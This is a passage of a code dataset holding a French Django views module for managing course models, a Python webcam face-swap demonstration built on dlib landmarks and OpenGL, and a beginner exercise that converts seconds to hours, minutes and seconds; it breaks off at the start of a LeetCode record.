UEForm(request.POST, instance=ue)\n\t\n\tif form.is_valid():\n\t\tform.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef paramAjouterUE(request, idModele, idSemestre):\n\t\n\tsemestre = ModeleSemestre.objects.get(id=idSemestre)\n\tform = UEForm()\n\t\n\treturn render(request, 'enseignementManager/ajouterUE.html', locals())\n\t\ndef ajouterUE(request):\n\tform = UEForm(request.POST)\n\t\n\tif form.is_valid():\n\t\tue = form.save(commit = False)\n\t\tue.modeleSemestre = ModeleSemestre.objects.get(id=request.POST['idSemestre'])\n\t\tue.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef supprimerUE(request, idModele, idUE):\n\t\n\ttry:\n\t\tmodeleUE = ModeleUE.objects.get(id=idUE)\n\texcept ModeleUE.DoesNotExist:\n\t\ttitreErreur = 'Erreur de suppression du modèle d\\'UE'\n\t\tmessageErreur = 'Le modèle d\\'UE que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/modifierTreeViewModeleFormation/' + idModele\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\n\t\tmodeleUE.delete()\n\t\treturn modifierTreeViewModeleFormation(request, idModele)\n\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle d\\'UE ' + modeleUE.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerUE/' + idModele + '/' + idUE\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\ndef paramModifierModule(request, idModele, idModule):\n\t\n\tmodule = ModeleModule.objects.get(id=idModule)\n\tform = ModuleForm(instance=module)\n\t\n\treturn render(request, 'enseignementManager/modifierModule.html', locals())\n\t\ndef modifierModule(request):\n\tmodule = ModeleModule.objects.get(id=request.POST['idModule'])\n\tform = ModuleForm(request.POST, instance=module)\n\t\n\tif form.is_valid():\n\t\tform.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef paramAjouterModule(request, idModele, idUE):\n\t\n\tue = ModeleUE.objects.get(id=idUE)\n\tform = ModuleForm()\n\t\n\treturn render(request, 'enseignementManager/ajouterModule.html', locals())\n\t\ndef ajouterModule(request):\n\t\n\tform = ModuleForm(request.POST)\n\t\n\tif form.is_valid():\n\t\tmodule = form.save(commit = False)\n\t\tmodule.modeleUE = ModeleUE.objects.get(id=request.POST['idUE'])\n\t\tmodule.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef supprimerModule(request, idModele, idModule):\n\t\n\ttry:\n\t\tmodeleModule = ModeleModule.objects.get(id=idModule)\n\texcept ModeleModule.DoesNotExist:\n\t\ttitreErreur = 'Erreur de suppression du modèle de module'\n\t\tmessageErreur = 'Le modèle de module que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/modifierTreeViewModeleFormation/' + idModele\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\n\t\tmodeleModule.delete()\n\t\treturn modifierTreeViewModeleFormation(request, idModele)\n\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de module ' + modeleModule.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerModule/' + idModele + '/' + idModule\n\t\treturn render(request, 'pageConfirmation.html', 
locals())\n\ndef homeBAC(request):\n\treturn homeBACMessage(request, False)\n\ndef homeBACMessage(request, messageAAfficher):\n\n\tif request.method == 'POST':\n\t\tform = BACForm(request.POST)\n\t\t\n\t\tif form.is_valid():\n\t\t\t\n\t\t\ttry:\n\t\t\t\tbac = BAC.objects.get(intitule=request.POST['intitule'])\n\t\t\t\t\n\t\t\t\t# Erreur, bac déjà existant.\n\t\t\t\ttitreErreur = 'Erreur de création du BAC.'\n\t\t\t\tmessageErreur = 'Le nom du BAC doit être unique.'\n\t\t\t\tdetailsErreur = []\n\t\t\t\tdetailsErreur.append('Il existe déjà un BAC nommé : \\'' + request.POST['intitule'] + '\\'')\n\t\t\t\tpageRetour = '/gestionEnseignement/BAC'\n\t\t\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\t\t\n\t\t\texcept BAC.DoesNotExist:\n\t\t\t\t\n\t\t\t\tbac = form.save()\n\t\t\t\tmessageAAfficher = 'Le BAC ' + bac.intitule + ' a bien été ajouté.'\n\t\n\tetus = Etudiant.objects.all()\n\t\n\tlisteBACNonSupprimable = []\n\t\n\tfor etu in etus:\n\t\tlisteBACNonSupprimable.append(etu.BAC)\n\t\n\tform = BACForm()\n\t\n\t#On récupère tous les bacs présents dans la BDD en vue d'un affichage\n\tmodelesBAC = BAC.objects.all()\n\t\n\treturn render(request, 'enseignementManager/ModelesOnglets.html', locals())\n\ndef supprimerBAC(request, idBAC):\n\t#On récupère le BAC dans une variable avant de le supprimer, afin d'avoir accès à son intitule.\n\ttry:\n\t\tmodeleBAC = BAC.objects.get(id=idBAC)\n\t\t\n\texcept BAC.DoesNotExist:\n\t\t# Erreur, BAC inexistant.\n\t\ttitreErreur = 'Erreur de suppression du BAC.'\n\t\tmessageErreur = 'Le BAC que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/BAC'\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\t\n\t\tmessageAAfficher = 'Le BAC ' + modeleBAC.intitule + ' à bien été supprimé.'\n\t\tmodeleBAC.delete()\n\t\trequest.method = 'GET'\n\t\treturn homeBACMessage(request, messageAAfficher)\n\t\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de BAC ' + modeleBAC.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerBAC/' + idBAC\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\ndef paramModifierBAC(request, idBAC):\n\t\n\tmodeleBAC = BAC.objects.get(id=idBAC)\n\tform = BACForm(instance=modeleBAC)\n\treturn render(request, 'enseignementManager/modifierBAC.html', locals())\n\ndef modifierBAC(request):\n\n\tmodeleBAC = BAC.objects.get(id=request.POST['idBAC'])\n\tform = BACForm(request.POST, instance=modeleBAC)\n\tmessageAAfficher = 'Le BAC à bien été modifié.'\n\tif form.is_valid():\n\t\trequest.method = 'GET'\n\t\tform.save()\n\t\n\treturn homeBACMessage(request, messageAAfficher)\n\t\n\"\"\"\nGestion des cursus :\n\"\"\"\ndef homeCursus(request):\n\treturn homeCursusMessage(request, False)\n\ndef homeCursusMessage(request, messageAAfficher):\n\t\n\tif request.method == 'POST': #S'il s'agit d'une requête POST.\n\t\tform = CursusForm(request.POST)\n\t\t\n\t\tif form.is_valid():\n\t\t\t\n\t\t\ttry:\n\t\t\t\tcursusExistant = CursusPossible.objects.get(intitule=request.POST['intitule'])\n\t\t\t\t\n\t\t\t\t# Erreur, cursus déjà existant.\n\t\t\t\ttitreErreur = 'Erreur de création du cursus.'\n\t\t\t\tmessageErreur = 'Le nom du cursus doit être unique.'\n\t\t\t\tdetailsErreur = []\n\t\t\t\tdetailsErreur.append('Il existe déjà un cursus nommé : \\'' + request.POST['intitule'] + '\\'')\n\t\t\t\tpageRetour = 
'/gestionEnseignement/cursus'\n\t\t\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\t\t\t\n\t\t\texcept CursusPossible.DoesNotExist:\n\t\t\t\t\n\t\t\t\t# le cursus n'existe pas, on peut le rajouter\n\t\t\n\t\t\t\tcurs = form.save()\n\t\t\t\tmessageAAfficher = 'Le Cursus ' + curs.intitule + ' a bien été ajouté.'\n\t\t\t\t\n\tform = CursusForm()\n\t\n\t# liste de tous les modeles de cursus\n\ttabCursus = CursusPossible.objects.all().order_by('-id')\n\t\n\t#tableau qui stockera les cursus à ne pas supprimer.\n\tcursusNonSupprimable = []\n\t\n\t#On récupère nos cursus pré/postDUT\n\tcursPreDUT = CursusPreDUT.objects.all()\n\tcursusPostDUT = CursusPostDUT.objects.all()\n\t\n\t#On test tous nos cursus pour voir lesquels sont supprimables/non supprimables.\n\tfor curs in cursPreDUT:\n\t\tcursusNonSupprimable.append(curs.cursus)\n\t\t\n\tfor curs in cursusPostDUT:\n\t\tcursusNonSupprimable.append(curs.cursus)\n\t\n\treturn render(request, 'enseignementManager/ModelesOnglets.html', locals())\n\n\ndef supprimerCursus(request, idCursus):\n\t#On récupère le cursus dans une variable avant de le supprimer, afin d'avoir accès à son intitule.\n\ttry:\n\t\tcurs = CursusPossible.objects.get(id=idCursus)\n\t\t\n\texcept CursusPossible.DoesNotExist:\n\t\t# Erreur, cursus inexistant.\n\t\ttitreErreur = 'Erreur de suppression du cursus.'\n\t\tmessageErreur = 'Le cursus que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/cursus'\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\t\n\t\tmessageAAfficher = 'Le cursus ' + curs.intitule + ' à bien été supprimé.'\n\t\tcurs.delete()\n\t\trequest.method = 'GET'\n\t\treturn homeCursusMessage(request, messageAAfficher)\n\t\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de cursus ' + curs.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerCursus/' + idCursus\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\ndef paramModifierCursus(request, idCursus):\n\t\n\tcursus = CursusPossible.objects.get(id=idCursus)\n\tform = CursusForm(instance=cursus)\n\t\n\treturn render(request, 'enseignementManager/modifierCursus.html', locals())\n\ndef modifierCursus(request):\n\tcursus = CursusPossible.objects.get(id=request.POST['idCursus'])\n\tform = CursusForm(request.POST, instance=cursus)\n\tmessageAAfficher = 'Le cursus à bien été modifié.'\n\tif form.is_valid():\n\t\trequest.method = 'GET'\n\t\tform.save()\n\t\n\treturn homeCursusMessage(request, messageAAfficher)","sub_path":"enseignementManager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"509107385","text":"import dlib\nimport cv2\nimport numpy as np\nfrom abc import ABCMeta, abstractmethod\nfrom scipy import optimize\nfrom dlib import rectangle\nimport pygame\nfrom pygame.locals import *\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nfrom scipy import optimize\n\n\nfrom tkinter import filedialog\nimport os\n\ndef getNormal(triangle):\n a = triangle[:, 0]\n b = triangle[:, 1]\n c = triangle[:, 2]\n\n axisX = b - a\n axisX = axisX / np.linalg.norm(axisX)\n axisY = c - a\n axisY = axisY / np.linalg.norm(axisY)\n axisZ = np.cross(axisX, axisY)\n axisZ = axisZ / np.linalg.norm(axisZ)\n\n return axisZ\n\n\ndef flipWinding(triangle):\n return 
[triangle[1], triangle[0], triangle[2]]\n\n\ndef fixMeshWinding(mesh, vertices):\n for i in range(mesh.shape[0]):\n triangle = mesh[i]\n normal = getNormal(vertices[:, triangle])\n if normal[2] > 0:\n mesh[i] = flipWinding(triangle)\n\n return mesh\n\n\ndef getShape3D(mean3DShape, blendshapes, params):\n # skalowanie\n s = params[0]\n # rotacja\n r = params[1:4]\n # przesuniecie (translacja)\n t = params[4:6]\n w = params[6:]\n\n # macierz rotacji z wektora rotacji, wzor Rodriguesa\n R = cv2.Rodrigues(r)[0]\n shape3D = mean3DShape + np.sum(w[:, np.newaxis, np.newaxis] * blendshapes, axis=0)\n\n shape3D = s * np.dot(R, shape3D)\n shape3D[:2, :] = shape3D[:2, :] + t[:, np.newaxis]\n\n return shape3D\n\n\ndef getMask(renderedImg):\n mask = np.zeros(renderedImg.shape[:2], dtype=np.uint8)\n return mask\n\n\ndef load3DFaceModel(filename):\n faceModelFile = np.load(filename)\n mean3DShape = faceModelFile[\"mean3DShape\"]\n mesh = faceModelFile[\"mesh\"]\n idxs3D = faceModelFile[\"idxs3D\"]\n idxs2D = faceModelFile[\"idxs2D\"]\n blendshapes = faceModelFile[\"blendshapes\"]\n mesh = fixMeshWinding(mesh, mean3DShape)\n\n return mean3DShape, blendshapes, mesh, idxs3D, idxs2D\n\n\ndef getFaceKeypoints(img, detector, predictor, maxImgSizeForDetection=640):\n imgScale = 1\n scaledImg = img\n if max(img.shape) > maxImgSizeForDetection:\n imgScale = maxImgSizeForDetection / float(max(img.shape))\n scaledImg = cv2.resize(img, (int(img.shape[1] * imgScale), int(img.shape[0] * imgScale)))\n\n # detekcja twarzy\n dets = detector(scaledImg, 1)\n\n if len(dets) == 0:\n return None\n\n shapes2D = []\n for det in dets:\n faceRectangle = rectangle(int(det.left() / imgScale), int(det.top() / imgScale), int(det.right() / imgScale),\n int(det.bottom() / imgScale))\n\n # detekcja punktow charakterystycznych twarzy\n dlibShape = predictor(img, faceRectangle)\n\n shape2D = np.array([[p.x, p.y] for p in dlibShape.parts()])\n # transpozycja, zeby ksztalt byl 2 x n a nie n x 2, pozniej ulatwia to obliczenia\n shape2D = shape2D.T\n\n shapes2D.append(shape2D)\n\n return shapes2D\n\n\ndef getFaceTextureCoords(img, mean3DShape, blendshapes, idxs2D, idxs3D, detector, predictor):\n projectionModel = OrthographicProjectionBlendshapes(blendshapes.shape[0])\n\n keypoints = getFaceKeypoints(img, detector, predictor)[0]\n modelParams = projectionModel.getInitialParameters(mean3DShape[:, idxs3D], keypoints[:, idxs2D])\n modelParams = GaussNewton(modelParams, projectionModel.residual, projectionModel.jacobian,\n ([mean3DShape[:, idxs3D], blendshapes[:, :, idxs3D]], keypoints[:, idxs2D]), verbose=0)\n textureCoords = projectionModel.fun([mean3DShape, blendshapes], modelParams)\n\n return textureCoords\n\n\nclass Model(metaclass=ABCMeta):\n nParams = 0\n\n # zwraca wektor rezyduow przy danych parametrach modelu, wektorze wejsciowym i oczekiwanych wektorze wyjsciowym\n def residual(self, params, x, y):\n r = y - self.fun(x, params)\n r = r.flatten()\n\n return r\n\n # zwraca wartosci zwracane przez model przy danych parametrach i wektorze wejsciowym\n @abstractmethod\n def fun(self, x, params):\n pass\n\n # zwraca jakobian\n @abstractmethod\n def jacobian(self, params, x, y):\n pass\n\n # zwraca zbior przykladowych parametrow modelu\n @abstractmethod\n def getExampleParameters(self):\n pass\n\n # zwraca inny zbior przykladowych parametrow\n @abstractmethod\n def getInitialParameters(self):\n pass\n\n\nclass OrthographicProjectionBlendshapes(Model):\n nParams = 6\n\n def __init__(self, nBlendshapes):\n self.nBlendshapes = nBlendshapes\n 
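# parameter vector layout shared by fun() and jacobian(): params[0] = scale, params[1:4] = rotation (Rodrigues vector), params[4:6] = 2D translation, params[6:] = the nBlendshapes blendshape weights\n 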
self.nParams += nBlendshapes\n\n def fun(self, x, params):\n # skalowanie\n s = params[0]\n # rotacja\n r = params[1:4]\n # przesuniecie (translacja)\n t = params[4:6]\n w = params[6:]\n\n mean3DShape = x[0]\n blendshapes = x[1]\n\n # macierz rotacji z wektora rotacji, wzor Rodriguesa\n R = cv2.Rodrigues(r)[0]\n P = R[:2]\n shape3D = mean3DShape + np.sum(w[:, np.newaxis, np.newaxis] * blendshapes, axis=0)\n\n projected = s * np.dot(P, shape3D) + t[:, np.newaxis]\n\n return projected\n\n def jacobian(self, params, x, y):\n s = params[0]\n r = params[1:4]\n t = params[4:6]\n w = params[6:]\n\n mean3DShape = x[0]\n blendshapes = x[1]\n\n R = cv2.Rodrigues(r)[0]\n P = R[:2]\n shape3D = mean3DShape + np.sum(w[:, np.newaxis, np.newaxis] * blendshapes, axis=0)\n\n nPoints = mean3DShape.shape[1]\n\n # nSamples * 2 poniewaz kazdy punkt ma dwa wymiary (x i y)\n jacobian = np.zeros((nPoints * 2, self.nParams))\n\n jacobian[:, 0] = np.dot(P, shape3D).flatten()\n\n stepSize = 10e-4\n step = np.zeros(self.nParams)\n step[1] = stepSize;\n jacobian[:, 1] = ((self.fun(x, params + step) - self.fun(x, params)) / stepSize).flatten()\n step = np.zeros(self.nParams)\n step[2] = stepSize;\n jacobian[:, 2] = ((self.fun(x, params + step) - self.fun(x, params)) / stepSize).flatten()\n step = np.zeros(self.nParams)\n step[3] = stepSize;\n jacobian[:, 3] = ((self.fun(x, params + step) - self.fun(x, params)) / stepSize).flatten()\n\n jacobian[:nPoints, 4] = 1\n jacobian[nPoints:, 5] = 1\n\n startIdx = self.nParams - self.nBlendshapes\n for i in range(self.nBlendshapes):\n jacobian[:, i + startIdx] = s * np.dot(P, blendshapes[i]).flatten()\n\n return jacobian\n\n # nie uzywane\n def getExampleParameters(self):\n params = np.zeros(self.nParams)\n params[0] = 1\n\n return params\n\n def getInitialParameters(self, x, y):\n mean3DShape = x.T\n shape2D = y.T\n\n shape3DCentered = mean3DShape - np.mean(mean3DShape, axis=0)\n shape2DCentered = shape2D - np.mean(shape2D, axis=0)\n\n scale = np.linalg.norm(shape2DCentered) / np.linalg.norm(shape3DCentered[:, :2])\n t = np.mean(shape2D, axis=0) - np.mean(mean3DShape[:, :2], axis=0)\n\n params = np.zeros(self.nParams)\n params[0] = scale\n params[4] = t[0]\n params[5] = t[1]\n\n return params\n\n\ndef setOrtho(w, h):\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(0, w, h, 0, -1000, 1000)\n glMatrixMode(GL_MODELVIEW)\n\n\ndef addTexture(img):\n textureId = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, textureId)\n glPixelStorei(GL_UNPACK_ALIGNMENT, 1)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, img.shape[1], img.shape[0], 0, GL_BGR, GL_UNSIGNED_BYTE, img)\n\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_DECAL)\n\n return textureId\n\n\nclass FaceRenderer:\n def __init__(self, targetImg, textureImg, textureCoords, mesh):\n self.h = targetImg.shape[0]\n self.w = targetImg.shape[1]\n\n pygame.init()\n pygame.display.set_mode((self.w, self.h), DOUBLEBUF | OPENGL)\n setOrtho(self.w, self.h)\n\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_TEXTURE_2D)\n\n self.textureCoords = textureCoords\n self.textureCoords[0, :] /= textureImg.shape[1]\n self.textureCoords[1, :] /= textureImg.shape[0]\n\n self.faceTexture = addTexture(textureImg)\n self.renderTexture = addTexture(targetImg)\n\n self.mesh = mesh\n\n def drawFace(self, vertices):\n glBindTexture(GL_TEXTURE_2D, self.faceTexture)\n\n glBegin(GL_TRIANGLES)\n for triangle in self.mesh:\n for 
vertex in triangle:\n glTexCoord2fv(self.textureCoords[:, vertex])\n glVertex3fv(vertices[:, vertex])\n\n glEnd()\n\n def render(self, vertices):\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n self.drawFace(vertices)\n\n data = glReadPixels(0, 0, self.w, self.h, GL_BGR, GL_UNSIGNED_BYTE)\n renderedImg = np.frombuffer(data, dtype=np.uint8).copy()\n renderedImg = renderedImg.reshape((self.h, self.w, 3))\n for i in range(renderedImg.shape[2]):\n renderedImg[:, :, i] = np.flipud(renderedImg[:, :, i])\n\n pygame.display.flip()\n return renderedImg\n\n\ndef LineSearchFun(alpha, x, d, fun, args):\n r = fun(x + alpha * d, *args)\n return np.sum(r ** 2)\n\n\ndef GaussNewton(x0, fun, funJack, args, maxIter=10, eps=10e-7, verbose=1):\n x = np.array(x0, dtype=np.float64)\n\n oldCost = -1\n for i in range(maxIter):\n r = fun(x, *args)\n cost = np.sum(r ** 2)\n\n if verbose > 0:\n print(\"Cost at iteration \" + str(i) + \": \" + str(cost))\n\n if (cost < eps or abs(cost - oldCost) < eps):\n break\n oldCost = cost\n\n J = funJack(x, *args)\n grad = np.dot(J.T, r)\n H = np.dot(J.T, J)\n direction = np.linalg.solve(H, grad)\n\n # optymalizacja dlugosci kroku\n lineSearchRes = optimize.minimize_scalar(LineSearchFun, args=(x, direction, fun, args))\n # dlugosc kroku\n alpha = lineSearchRes[\"x\"]\n\n x = x + alpha * direction\n\n if verbose > 0:\n print(\"Gauss Newton finished after \" + str(i + 1) + \" iterations\")\n r = fun(x, *args)\n cost = np.sum(r ** 2)\n print(\"cost = \" + str(cost))\n print(\"x = \" + str(x))\n\n return x\n\n\ndef SteepestDescent(x0, fun, funJack, args, maxIter=10, eps=10e-7, verbose=1):\n x = np.array(x0, dtype=np.float64)\n\n oldCost = -1\n for i in range(maxIter):\n r = fun(x, *args)\n cost = np.sum(r ** 2)\n\n if verbose > 0:\n print(\"Cost at iteration \" + str(i) + \": \" + str(cost))\n\n # warunki stopu\n if (cost < eps or abs(cost - oldCost) < eps):\n break\n oldCost = cost\n\n J = funJack(x, *args)\n grad = 2 * np.dot(J.T, r)\n direction = grad\n\n # optymalizacja dlugosci kroku\n lineSearchRes = optimize.minimize_scalar(LineSearchFun, args=(x, direction, fun, args))\n # dlugosc kroku\n alpha = lineSearchRes[\"x\"]\n\n x = x + alpha * direction\n\n if verbose > 0:\n print(\"Steepest Descent finished after \" + str(i + 1) + \" iterations\")\n r = fun(x, *args)\n cost = np.sum(r ** 2)\n print(\"cost = \" + str(cost))\n print(\"x = \" + str(x))\n\n return x\n\n\ndef blendImages(src, dst, mask, featherAmount=0.2):\n # indeksy nie czarnych pikseli maski\n maskIndices = np.where(mask != 0)\n # te same indeksy tylko, ze teraz w jednej macierzy, gdzie kazdy wiersz to jeden piksel (x, y)\n maskPts = np.hstack((maskIndices[1][:, np.newaxis], maskIndices[0][:, np.newaxis])).astype(np.int32)\n faceSize = np.max(maskPts, axis=0) - np.min(maskPts, axis=0)\n featherAmount = featherAmount * np.max(faceSize)\n\n hull = cv2.convexHull(maskPts)\n dists = np.zeros(maskPts.shape[0])\n for i in range(maskPts.shape[0]):\n dists[i] = cv2.pointPolygonTest(hull, (int(maskPts[i, 0]), int(maskPts[i, 1])), True)\n\n weights = np.clip(dists / featherAmount, 0, 1)\n\n composedImg = np.copy(dst)\n composedImg[maskIndices[0], maskIndices[1]] = weights[:, np.newaxis] * src[maskIndices[0], maskIndices[1]] + (\n 1 - weights[:, np.newaxis]) * dst[maskIndices[0], maskIndices[1]]\n\n return composedImg\n\n\n# uwaga, tutaj src to obraz, z ktorego brany bedzie kolor\ndef colorTransfer(src, dst, mask):\n transferredDst = np.copy(dst)\n # indeksy nie czarnych pikseli maski\n maskIndices = np.where(mask != 0)\n # src[maskIndices[0], 
maskIndices[1]] zwraca piksele w nie czarnym obszarze maski\n\n maskedSrc = src[maskIndices[0], maskIndices[1]].astype(np.int32)\n maskedDst = dst[maskIndices[0], maskIndices[1]].astype(np.int32)\n\n meanSrc = np.mean(maskedSrc, axis=0)\n meanDst = np.mean(maskedDst, axis=0)\n\n maskedDst = maskedDst - meanDst\n maskedDst = maskedDst + meanSrc\n maskedDst = np.clip(maskedDst, 0, 255)\n\n transferredDst[maskIndices[0], maskIndices[1]] = maskedDst\n\n return transferredDst\n\n\ndef drawPoints(img, points, color=(0, 255, 0)):\n for point in points:\n cv2.circle(img, (int(point[0]), int(point[1])), 2, color)\n\n\ndef drawCross(img, params, center=(100, 100), scale=30.0):\n R = cv2.Rodrigues(params[1:4])[0]\n\n points = np.array([[1, 0, 0], [0, -1, 0], [0, 0, -1]])\n points = np.dot(points, R.T)\n points2D = points[:, :2]\n\n points2D = (points2D * scale + center).astype(np.int32)\n\n cv2.line(img, (center[0], center[1]), (points2D[0, 0], points2D[0, 1]), (255, 0, 0), 3)\n cv2.line(img, (center[0], center[1]), (points2D[1, 0], points2D[1, 1]), (0, 255, 0), 3)\n cv2.line(img, (center[0], center[1]), (points2D[2, 0], points2D[2, 1]), (0, 0, 255), 3)\n\n\ndef drawMesh(img, shape, mesh, color=(255, 0, 0)):\n for triangle in mesh:\n point1 = shape[triangle[0]].astype(np.int32)\n point2 = shape[triangle[1]].astype(np.int32)\n point3 = shape[triangle[2]].astype(np.int32)\n\n cv2.line(img, (point1[0], point1[1]), (point2[0], point2[1]), (255, 0, 0), 1)\n cv2.line(img, (point2[0], point2[1]), (point3[0], point3[1]), (255, 0, 0), 1)\n cv2.line(img, (point3[0], point3[1]), (point1[0], point1[1]), (255, 0, 0), 1)\n\n\ndef drawProjectedShape(img, x, projection, mesh, params, lockedTranslation=False):\n localParams = np.copy(params)\n\n if lockedTranslation:\n localParams[4] = 100\n localParams[5] = 200\n\n projectedShape = projection.fun(x, localParams)\n\n drawPoints(img, projectedShape.T, (0, 0, 255))\n drawMesh(img, projectedShape.T, mesh)\n drawCross(img, params)\n\ndef main():\n print(\"Press T to draw the keypoints and the 3D model\")\n print(\"Press R to start recording to a video file\")\n\n predictor_path = 'shape_predictor_68_face_landmarks.dat'\n default_dir=\"liuyifei.jpg\"\n image_name = filedialog.askopenfilename(title='选择含有人脸的图片', filetypes=[(\"png图片\", \"*.png\"), ('jpeg图片', '*.jpeg'),('jpg图片', '*.jpg')],\n initialdir=(os.path.expanduser(default_dir)))\n #image_name = cv2.imread(file_path, cv2.IMREAD_COLOR)\n #image_name = \"/Users/apple/PycharmProjects/001/data/wuyannzu.jpeg\"\n maxImageSizeForDetection = 300\n\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor(predictor_path)\n mean3DShape, blendshapes, mesh, idxs3D, idxs2D = load3DFaceModel(\"candide.npz\")\n projectionModel = OrthographicProjectionBlendshapes(blendshapes.shape[0])\n modelParams = None\n lockedTranslation = False\n drawOverlay = False\n cap = cv2.VideoCapture(0)\n writer = None\n cameraImg = cap.read()[1]\n textureImg = cv2.imread(image_name)\n textureCoords = getFaceTextureCoords(textureImg, mean3DShape, blendshapes, idxs2D, idxs3D, detector, predictor)\n renderer = FaceRenderer(cameraImg, textureImg, textureCoords, mesh)\n\n while True:\n cameraImg = cap.read()[1]\n shapes2D = getFaceKeypoints(cameraImg, detector, predictor, maxImageSizeForDetection)\n\n if shapes2D is not None:\n for shape2D in shapes2D:\n modelParams = projectionModel.getInitialParameters(mean3DShape[:, idxs3D], shape2D[:, idxs2D])\n\n # 3D model parameter optimization\n modelParams = GaussNewton(modelParams, 
                # 3D model parameter optimization\n                modelParams = GaussNewton(modelParams, projectionModel.residual, projectionModel.jacobian,\n                                          ([mean3DShape[:, idxs3D], blendshapes[:, :, idxs3D]], shape2D[:, idxs2D]),\n                                          verbose=0)\n\n                # rendering the model to an image\n                shape3D = getShape3D(mean3DShape, blendshapes, modelParams)\n                renderedImg = renderer.render(shape3D)\n                mask = np.copy(renderedImg[:, :, 0])\n                renderedImg = colorTransfer(cameraImg, renderedImg, mask)\n                cameraImg = blendImages(renderedImg, cameraImg, mask)\n\n                if drawOverlay:\n                    drawPoints(cameraImg, shape2D.T)\n                    drawProjectedShape(cameraImg, [mean3DShape, blendshapes], projectionModel, mesh, modelParams,\n                                       lockedTranslation)\n\n        if writer is not None:\n            writer.write(cameraImg)\n\n        cv2.imshow('image', cameraImg)\n        key = cv2.waitKey(1)\n        if key == 27:\n            break\n        if key == ord(\"q\"):\n            break\n        if key == ord('t'):\n            drawOverlay = not drawOverlay\n        if key == ord('r'):\n            if writer is None:\n                print(\"Starting video writer\")\n                # cv2.VideoWriter_fourcc is the OpenCV 3+ spelling of the old cv2.cv.CV_FOURCC;\n                # the writer must be created here or isOpened() below would be called on None\n                writer = cv2.VideoWriter(\"../out.avi\", cv2.VideoWriter_fourcc('X', 'V', 'I', 'D'), 25, (cameraImg.shape[1], cameraImg.shape[0]))\n\n                if writer.isOpened():\n                    print(\"Writer successfully opened\")\n                else:\n                    writer = None\n                    print(\"Writer opening failed\")\n            else:\n                print(\"Stopping video writer\")\n                writer.release()\n                writer = None\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"swap_face.py","file_name":"swap_face.py","file_ext":"py","file_size_in_byte":17934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"110043522","text":"\"\"\"Write a program that takes the number of seconds as input,\nand then converts that to minutes and seconds (for example, 102->1 min, 42 sec)\nand prints the result. Also, if you want, convert it to\nhours, minutes, and seconds. \"\"\"\n\n#Input the time in seconds\ntime = int(input(\"Enter the number of seconds: \"))\n\n#Calculate the number of seconds\nseconds = time % 60\n\n#Subtract out the seconds and calculate how many minutes remain\n#(integer division keeps the running total a whole number in Python 3)\ntime = (time - seconds) // 60\n\n#Calculate the number of minutes\nminutes = time % 60\n\n#Calculate the number of hours\nhours = (time - minutes) // 60\n\n#Print everything out\nprint(\"This is equal to \" + str(hours) + \" hours and \" +\n      str(minutes) + \" minutes and \" + str(seconds) + \" seconds.\")\n\n\"\"\"Note: you can split the print statement across several lines\nto make it easier to read.\"\"\"\n","sub_path":"Class 1/Class 1 Solutions/1.4 - Time.py","file_name":"1.4 - Time.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"249096137","text":"#\n# @lc app=leetcode id=100 lang=python3\n#\n# [100] Same Tree\n#\n# https://leetcode.com/problems/same-tree/description/\n#\n# algorithms\n# Easy (50.77%)\n# Likes: 